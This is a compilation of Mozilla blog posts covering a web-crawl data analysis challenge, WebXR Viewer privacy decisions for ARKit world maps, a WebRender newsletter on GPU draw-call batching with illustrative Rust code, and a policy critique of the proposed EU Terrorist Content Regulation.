Two cohorts of Canadian undergraduate interns worked on data collection and subsequent analysis. The Mozilla Systems Research Group is now open sourcing a dataset of publicly available information that was collected by a Web crawl in November 2017. This dataset is currently being used to help inform product teams at Mozilla. The primary analysis from the students focused on:

  • Session replay analysis: when websites replay your behavior on the site
  • Eval and dynamically created function calls
  • Cryptojacking: websites using users’ computers to mine cryptocurrencies are mainly video streaming sites

Take a look at Mozilla’s Hacks blog for a longer description of the analysis.

The Data Analysis Challenge

We see great potential in this dataset and believe that our analysis has only scratched the surface of the insights it can offer. We want to empower the community to use this data to better understand what is happening on the Web today, which is why Mozilla’s Systems Research Group and Open Innovation team partnered together to launch this challenge.

We have looked at how other organizations enable and speed up scientific discoveries through collaboratively analyzing large datasets. We’d love to follow this exploratory path: we want to encourage the crowd to think outside the proverbial box, get creative, and get under the surface. We hope participants get excited to dig into the JavaScript execution data and come up with new observations, patterns, and research findings.

To guide thinking, we’re dividing the Challenge into three categories:

  1. Tracking and Privacy
  2. Web Technologies and the Shape of the Modern Web
  3. Equality, Neutrality, and Law

You will find all of the necessary information to join on the Challenge website. The submissions will close on August 31st and the winners will be announced on September 14th. We will bring the winners of the best three analyses (one per category) to MozFest, the world’s leading festival for the open internet movement, taking place in London from October 26th to 28th, 2018. We will cover their airfare, hotel, admission/registration, and, if necessary, visa fees in accordance with the official rules. We may also invite the winners to do 15-minute presentations of their findings.

We are looking forward to the diverse and innovative approaches from the data science community, and we want to specifically encourage young data scientists and students to take a stab at this dataset. It could be the basis for your final university project, and analyzing it can grow your data science skills and build your resumé (and GitHub profile!). The Web gets more complex by the minute; keeping it safe and open can only happen if we work together. Join us!


Overscripted Web: a Mozilla Data Analysis Challenge was originally published in Mozilla Open Innovation on Medium.

Mozilla VR BlogUpdating the WebXR Viewer for iOS 12 / ARKit 2.0

Over the past few months, we've continued to leverage the features of ARKit on iOS to enhance the WebXR Viewer app and explore ideas and issues with WebXR. One big question with WebXR on modern AR and VR platforms is how to best leverage the platform to provide a frictionless experience while also supporting the advanced capabilities users will expect, in a safe and platform-independent way.

Last year, we created an experimental version of an API for WebXR and built the WebXR Viewer iOS app to allow ourselves and others to experiment with WebXR on iOS using ARKit. In the near future, the WebXR Device API will be finalized and implementations will begin to appear; we're already working on a new Javascript library that allows the WebXR Viewer to expose the new API, and expect to ship an update with the official API shortly after the webxr polyfill is updated to match the final API.

We recently released an update to the WebXR Viewer that fixes some small bugs and updates the app to iOS 12 and ARKit 2.0 (we haven't exposed all of ARKit 2.0 yet, but expect to over the coming months). Beyond just bug fixes, two features of the new app highlight interesting questions for WebXR related to privacy, friction and platform independence.

First, Web browsers can decrease friction for users moving from one AR experience to another by managing the underlying platform efficiently and not shutting it down completely between sessions, but care needs to be taken not to expose data to applications that might surprise users.

Second, some advanced features imagined for WebXR are not (yet) available in a cross platform way, such as shareable world maps or persistent anchors. These capabilities are core to experiences users will expect, such as persistent content in the world or shared experiences between multiple co-located people.

In both cases, it is unclear what the right answer is.

Frictionless Experience and User Privacy

Hypothesis: regardless of how the underlying platform is used, when a new WebXR web page is loaded, it should only get information about the world that would be available if it were loaded for the first time, and not see existing maps or anchors from previous pages.

Consider the image (and video) below. The image shows the results of running the "World Knowledge" sample, and spending a few minutes walking from the second floor of a house, down the stairs to the main floor, around and down the stairs to the basement, and then back up and out the front door into the yard. Looking back at the house, you can see small planes for each stair, the floor and some parts of the walls (they are the translucent green polygons). Even after just a few minutes of running ARKit, a surprising amount of information can be exposed about the interior of a space.


If the same user visits another web page, the browser could choose to restart ARKit or not. Restarting results in a high-friction user experience: all knowledge of the world is lost, requiring the user to scan their environment to reinitialize the underlying platform. Not restarting, however, might expose information to the new web page that is surprising to the user. Since the page is visited while outside the house, a user might not expect it to have access to details of the interior.

In the WebXR Viewer, we do not reinitialize ARKit for each page. We made the decision that if a page is reloaded without visiting a different XR page, we leave ARKit running and all world knowledge is retained. This allows pages to be reloaded without completely restarting the experience. When a new WebXR page is visited, we keep ARKit running, but destroy all ARKit anchors and world knowledge (i.e., ARKit ARAnchors, such as ARPlaneAnchors) that are further than some threshold distance from the user (3 meters, by default, in our current implementation).
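
The app itself is implemented in Swift on top of ARKit's ARAnchor objects; the following is only an illustrative sketch of the pruning policy described above, written in Rust with hypothetical types rather than the app's actual code:

    #[derive(Clone, Copy)]
    struct Vec3 { x: f32, y: f32, z: f32 }

    // Stand-in for an ARKit anchor (e.g. a detected plane) with a world position.
    struct Anchor { position: Vec3 }

    fn distance(a: Vec3, b: Vec3) -> f32 {
        ((a.x - b.x).powi(2) + (a.y - b.y).powi(2) + (a.z - b.z).powi(2)).sqrt()
    }

    // When a new WebXR page is visited, ARKit keeps running but every anchor
    // further than the threshold from the user is dropped (3 meters by default).
    fn prune_anchors(anchors: Vec<Anchor>, user: Vec3, threshold_m: f32) -> Vec<Anchor> {
        anchors
            .into_iter()
            .filter(|anchor| distance(anchor.position, user) <= threshold_m)
            .collect()
    }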

In the video below, we demonstrate this behavior. When the user changes from the "World Knowledge" sample to the "Hit Test" sample, internally we destroy most of the anchors. When the user changes back to the "World Knowledge" sample, we again destroy most of the anchors. You can see at the end of the video that only the nearby planes still exist (the plane under the user and some of the planes on the front porch). Planes further away (inside the house, in this case) are gone. (Visiting non-XR pages does not count as visiting another page, although if the browser is not on an XR page we also shut down ARKit after a short time to save battery, which destroys all world knowledge as well.)


While this is a relatively simplistic approach to this tradeoff between friction and privacy, issues like these need to be considered when implementing WebXR inside a browser. Modern AR and VR platforms (such as Microsoft's Hololens or Magic Leap's ML1) are capable of synthesizing and exposing highly detailed maps of the environment, and retaining significant information over time. In these platforms, the world space model is retained over time and exposed to apps, so even if the browser restarts the underlying API for each visited page, the full model of the space is available unless the browser makes an explicit choice to not expose it to the web page.

Consider, for example, a user walking a similar path for a similarly short time in the above house while wearing a Microsoft Hololens. In this case, a map of the same environment is shown below.


This image (captured with Microsoft's debugging tools, while the user is sitting at a computer in the basement of the house, shown as the sphere and green view volume) is significantly more detailed than the ARKit planes. And it would be retained, improved and shared with all apps in this space as the user continues to wear and use the Hololens.

In both cases, the ARKit planes and Hololens maps were captured based on just a few minutes of walking in this house. Imagine the level of detail that might be available after extended use.

Platform-specific Capabilities

Hypothesis: advanced capabilities such as World Mapping, which are needed for user experiences that require persistence and shared content, will need cross-platform analogs to the platform silos currently available if the platform-independent character of the web is to extend to AR and VR.

ARKit 2.0 introduces the possibility of retrieving the current model of the world (the so-called ARWorldMap) used by ARKit for tracking planes and anchors in the world. The map can then be saved and/or shared with others, enabling both persistent and multi-user AR experiences.

In this version of the WebXR Viewer, we want to explore some ideas for persistent and shared experiences, so we added session.getWorldMap() and session.setWorldMap(map) commands to an active AR session (these can be seen in the "Persistence" sample, a small change to the "World Knowledge" sample above).

These capabilities raise questions of user privacy. ARKit's ARWorldMap is an opaque binary data structure, and it may contain a surprising amount of data about the space that could be extracted by determined application developers (the format is undocumented). Because of this, we leverage the existing privacy settings in the WebXR Viewer, and allow apps to retrieve the world map if (and only if) the user has given the page access to "world knowledge".

On the other hand, the WebXR Viewer allows a page to provide an ARWorldMap to ARKit and try and use it for relocalization with no heightened permissions. In theory, such an action could allow a malicious web app to try and "probe" the world by having the browser test if the user is in a certain location. In practice, such an attack seems infeasible: loading a map resets ARKit (a highly disruptive and visible action) and relocalizing the phone against a map takes an indeterminate amount of time regardless of whether the relocalization eventually succeeds or not.

While implementing these commands was trivial, exposing this capability raises a fundamental question for the design of WebXR (beyond questions of permissions and possible threats). Specifically, how might such capabilities eventually work in a cross-platform way, given that each XR platform is implementing these capabilities differently?

We have no answer for this question. For example, some devices, such as Hololens, allow spaces to be saved and shared, much like ARKit. But other platforms opt to only share Anchors, or do not (yet) allow sharing at all. Over time, we hope some common ground might emerge. Google has implemented their ARCore Cloud Anchors on both ARKit and ARCore; perhaps a similar approach could be taken that is more open and independent of one company's infrastructure, and could thus be standardized across many platforms.

Looking Forward

These issues are two of many issues that are being discussed and considered by the Immersive Web Community Group as we work on the initial WebXR Device API specification. If you want to see the full power of the various XR platforms exposed and available on the Web, done in a way that preserves the open, accessible and safe character of the Web, please join the discussion and help us ensure the success of the XR Web.

Mozilla GFXWebRender newsletter #31

Greetings! I’ll introduce WebRender’s 31st newsletter with a few words about batching.

Efficiently submitting work to GPUs isn’t as straightforward as one might think. It is not unusual for a CPU renderer to go through each graphic primitive (a blue filled circle, a purple stroked path, an image, etc.) in z-order to produce the final rendered image. While this isn’t the most efficient approach, on the CPU it matters more to optimize the inner loop of the algorithm that renders each individual object than to optimize away the overhead of alternating between various types of primitives. GPUs, however, work quite differently, and the cost of submitting small workloads is often higher than the time spent executing them.

I won’t go into the details of why GPUs work this way here, but the big takeaway is that it is best to not think of a GPU API draw call as a way to draw one thing, but rather as a way to submit as many items of the same type as possible. If we implement a shader to draw images, we get much better performance out of drawing many images in a single draw call than submitting a draw call for each image. I’ll call a “batch” any group of items that is rendered with a single drawing command.
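
As a rough illustration of what batching means here (hypothetical types, not WebRender's actual data structures), the simplest possible batcher just merges consecutive primitives of the same kind, in paint order, into a single draw call:

    #[derive(Clone, Copy, PartialEq, Eq)]
    enum Kind { Image, Text, Gradient }

    struct Primitive { kind: Kind }

    // One entry per draw call: which shader/kind it uses and how many items it draws.
    struct Batch { kind: Kind, count: usize }

    fn build_batches(prims: &[Primitive]) -> Vec<Batch> {
        let mut batches: Vec<Batch> = Vec::new();
        for prim in prims {
            match batches.last_mut() {
                // Same kind as the previous primitive: extend the current batch.
                Some(batch) if batch.kind == prim.kind => batch.count += 1,
                // A kind change forces a new draw call.
                _ => batches.push(Batch { kind: prim.kind, count: 1 }),
            }
        }
        batches
    }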

So the solution is simply to render all images in a draw call, and then all of the text, then all gradients, right? Well, it’s a tad more complicated because the submission order affects the result. We don’t want a gradient to overwrite text that is supposed to be rendered on top of it, so we have to maintain some guarantees about the order of the submissions for overlapping items.

In the 29th newsletter intro I talked about culling and the way we used to split the screen into tiles to accelerate discarding hidden primitives. This tiling system was also good at simplifying the problem of batching. In order to batch two primitives together we need to make sure that there is no primitive of a different type in between. Comparing all primitives on screen against every other primitive would be too expensive but the tiling scheme reduced this complexity a lot (we then only needed to compare primitives assigned to the same tile).

In the culling episode I also wrote that we removed the screen space tiling in favor of using the depth buffer for culling. This might sound like a regression for the performance of the batching code, but the depth buffer also introduced a very nice property: opaque elements can be drawn in any order without affecting correctness! This is because we store the z-index of each pixel in the depth buffer, so if some text is hidden by an opaque image we can still render the image before the text and the GPU will be configured to automatically discard the pixels of the text that are covered by the image.

In WebRender this means we were able to separate primitives into two groups: the opaque ones, and the ones that need to perform some blending. Batching opaque items is trivial since we are free to just put all opaque items of the same type in their own batch regardless of their painting order. For blended primitives we still need to check for overlaps, but we have fewer primitives to consider. Currently WebRender simply looks back over the last 10 blended primitives to see if there is a suitable batch with no primitive of another type overlapping in between, and defaults to starting a new batch otherwise. We could go for a more elaborate strategy, but this has turned out to work well so far since we put a lot more effort into moving as many primitives as possible into the opaque passes.
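
A simplified sketch of that strategy, again with hypothetical types rather than WebRender's real implementation: opaque items can join any existing batch of the same kind because the depth buffer resolves ordering, while blended items only look back over a bounded window and stop as soon as an overlapping batch of a different kind would make reordering incorrect.

    #[derive(Clone, Copy, PartialEq, Eq)]
    enum Kind { Image, Text, Gradient }

    #[derive(Clone, Copy)]
    struct Rect { x: f32, y: f32, w: f32, h: f32 }

    impl Rect {
        fn overlaps(&self, other: &Rect) -> bool {
            self.x < other.x + other.w && other.x < self.x + self.w
                && self.y < other.y + other.h && other.y < self.y + self.h
        }
    }

    struct Prim { kind: Kind, rect: Rect, opaque: bool }

    struct Batch { kind: Kind, rects: Vec<Rect> }

    const MAX_LOOKBACK: usize = 10;

    fn add_primitive(opaque: &mut Vec<Batch>, blended: &mut Vec<Batch>, prim: &Prim) {
        if prim.opaque {
            // The depth buffer discards hidden pixels, so painting order within
            // the opaque pass does not matter: merge with any batch of this kind.
            if let Some(batch) = opaque.iter_mut().find(|b| b.kind == prim.kind) {
                batch.rects.push(prim.rect);
                return;
            }
            opaque.push(Batch { kind: prim.kind, rects: vec![prim.rect] });
        } else {
            // Blended items: walk back over the most recent batches only.
            for batch in blended.iter_mut().rev().take(MAX_LOOKBACK) {
                if batch.kind == prim.kind {
                    // Compatible batch reached before hitting any overlap.
                    batch.rects.push(prim.rect);
                    return;
                }
                if batch.rects.iter().any(|r| r.overlaps(&prim.rect)) {
                    // Reordering past this batch would change the rendered result.
                    break;
                }
            }
            blended.push(Batch { kind: prim.kind, rects: vec![prim.rect] });
        }
    }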

In another episode I’ll describe how we pushed this one step further and made it possible to segment primitives into the opaque and non-opaque parts and further reduce the amount of blended pixels.

Notable WebRender and Gecko changes

  • Henrik added reftests for the ImageRendering property: (1), (2) and (3).
  • Bobby changed the way pref changes propagate through WebRender.
  • Bobby improved the texture cache debug view.
  • Bobby improved the texture cache eviction heuristics.
  • Chris fixed the way WebRender activation interacts with the progressive feature rollout system.
  • Chris added a marionette test running on a VM with a GPU.
  • Kats and Jamie experimented with various solution to a driver bug on some Adreno GPUs.
  • Kvark removed some smuggling of clipIds for clip and reference frame items in Gecko’s displaylist building code. This fixed a few existing bugs: (1), (2) and (3).
  • Matt and Jeff added some new telemetry and analyzed the results.
  • Matt added a debugging indicator that moves when a frame takes too long to help with catching performance issues.
  • Andrew landed his work on surface sharing for animated images which fixed most of the outstanding performance issues related to animated images.
  • Andrew completed animated image frame recycling.
  • Lee fixed a bug with sub-pixel glyph positioning.
  • Glenn fixed a crash.
  • Glenn fixed another crash.
  • Glenn reduced the need for full world rect calculation during culling to make it easier to do clustered culling.
  • Nical switched device coordinates to signed integers in order to be able to meet some of the needs of blob image recoordination and simplify some code.
  • Nical added some debug checks to avoid global OpenGL states from the embedder causing issues in WebRender.
  • Sotaro fixed an intermittent timeout.
  • Sotaro fixed a crash on Android related to SurfaceTexture.
  • Sotaro improved the frame synchronization code.
  • Sotaro cleaned up the frame synchronization code some more.
  • Timothy ported img AltFeedback items to WebRender.

Ongoing work

  • Glenn is about to land a major piece of his tiled picture caching work which should solve a lot of the remaining issues with pages that generate too much GPU work.
  • Matt, Dan and Jeff keep investigating CPU performance, a lot of which revolves around the many memory copies generated by rustc when moving structures on the stack.
  • Doug is investigating talos performance issues with document splitting.
  • Nical is making progress on improving the invalidation of tiled blob images during scrolling.
  • Kvark keeps catching smugglers in gecko’s displaylist building code.
  • Kats and Jamie are hunting driver bugs on Android.

Enabling WebRender in Firefox Nightly 

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

The Firefox FrontierTranslate the Web

Browser extensions make Google Translate even easier to use. With 100+ languages at the ready, Google Translate is the go-to translation tool for millions of people around the world. But … Read more

The post Translate the Web appeared first on The Firefox Frontier.

Mozilla Privacy BlogThe EU Terrorist Content Regulation – a threat to the ecosystem and our users’ rights

In September the European Commission proposed a new regulation that seeks to tackle the spread of ‘terrorist’ content on the internet. As we’ve noted already, the Commission’s proposal would seriously undermine internet health in Europe, by forcing companies to aggressively suppress user speech with limited due process and user rights safeguards. Here we unpack the proposal’s shortfalls, and explain how we’ll be engaging on it to protect our users and the internet ecosystem.  

As we’ve highlighted before, illegal content is symptomatic of an unhealthy internet ecosystem, and addressing it is something that we care deeply about. To that end, we recently adopted an addendum to our Manifesto, in which we affirmed our commitment to an internet that promotes civil discourse, human dignity, and individual expression. The issue is also at the heart of our recently published Internet Health Report, through its dedicated section on digital inclusion.

At the same time lawmakers in Europe have made online safety a major political priority, and the Terrorist Content regulation is the latest legislative initiative designed to tackle illegal and harmful content on the internet. Yet, while terrorist acts and terrorist content are serious issues, the response that the European Commission is putting forward with this legislative proposal is unfortunately ill-conceived, and will have many unintended consequences. Rather than creating a safer internet for European citizens and combating the serious threat of terrorism in all its guises, this proposal would undermine due process online; compel the use of ineffective content filters; strengthen the position of a few dominant platforms while hampering European competitors; and, ultimately, violate the EU’s commitment to protecting fundamental rights.

Many elements from the proposal are worrying, including:

  • The definition of ‘terrorist’ content is extremely broad, opening the door for a huge amount of over-removal (including the potential for discriminatory effect) and the resulting risk that much lawful and public interest speech will be indiscriminately taken down;
  • Government-appointed bodies, rather than independent courts, hold the ultimate authority to determine illegality, with few safeguards in place to ensure these authorities act in a rights-protective manner;
  • The aggressive one hour timetable for removal of content upon notification is barely feasible for the largest platforms, let alone the many thousands of micro, small and medium-sized online services that the proposal threatens;
  • Companies could be forced to implement ‘proactive measures’ including upload filters, which, as we’ve argued before, are neither effective nor appropriate for the task at hand; and finally,
  • The proposal risks making content removal an end in itself, simply pushing terrorist content off the open internet rather than tackling the underlying serious crimes.

As the European Commission acknowledges in its impact assessment, the severity of the measures that it proposes could only ever be justified by the serious nature of terrorism and terrorist content. On its face, this is a plausible assertion. However, the evidence base underlying the proposal does not support the Commission’s approach.  For as the Commission’s own impact assessment concedes, the volume of ‘terrorist’ content on the internet is on a downward trend, and only 6% of Europeans have reported seeing terrorist content online, realities which heighten the need for proportionality to be at the core of the proposal. Linked to this, the impact assessment predicts that an estimated 10,000 European companies are likely to fall within this aggressive new regime, even though data from the EU’s police cooperation agency suggests terrorist content is confined to circa 150 online services.

Moreover, the proposal conflates online speech with offline acts, despite the reality that the causal link between terrorist content online, radicalisation, and terrorist acts is far more nuanced. Within the academic research around terrorism and radicalisation, no clear and direct causal link between terrorist speech and terrorist acts has been established (see, in particular, research from UNESCO and RAND). With respect to radicalisation in particular, the broad research suggests exposure to radical political leaders and socio-economic factors are key components of the radicalisation process, and online speech is not a determinant. On this basis, the high evidential bar required to justify such a serious interference with fundamental rights and the health of the internet ecosystem is not met by the Commission. In addition, the shaky evidence base demands that the proposal be subject to far greater scrutiny than it has been afforded thus far.

Besides these concerns, it is saddening that this new legislation is likely to create a legal environment that will entrench the position of the largest commercial services that have the resources to comply, undermining the openness on which a healthy internet thrives. By setting a scope that covers virtually every service that hosts user content, and a compliance bar that only a handful of companies are capable of reaching, the new rules are likely to engender a ‘retreat from the edge’, as smaller, agile services are unable to bear the cost of competing with the established players. In addition, the imposition of aggressive take-down timeframes and automated filtering obligations is likely to further diminish Europe’s standing as a bastion for free expression and due process.

Ultimately, the challenge of building sustainable and rights-protective frameworks for tackling terrorism is a formidable one, and one that is exacerbated when the internet ecosystem is implicated. With that in mind,  we’ll continue to highlight how the nuanced interplay between hosting services, terrorist content, and terrorist acts mean this proposal requires far more scrutiny, deliberation, and clarification. At the very least, any legislation in this space must include far greater rights protection, measures to ensure that suppression of online content doesn’t become an end in itself, and a compliance framework that doesn’t make the whole internet march to the beat of a handful of large companies.

Stay tuned.

The post The EU Terrorist Content Regulation – a threat to the ecosystem and our users’ rights appeared first on Open Policy & Advocacy.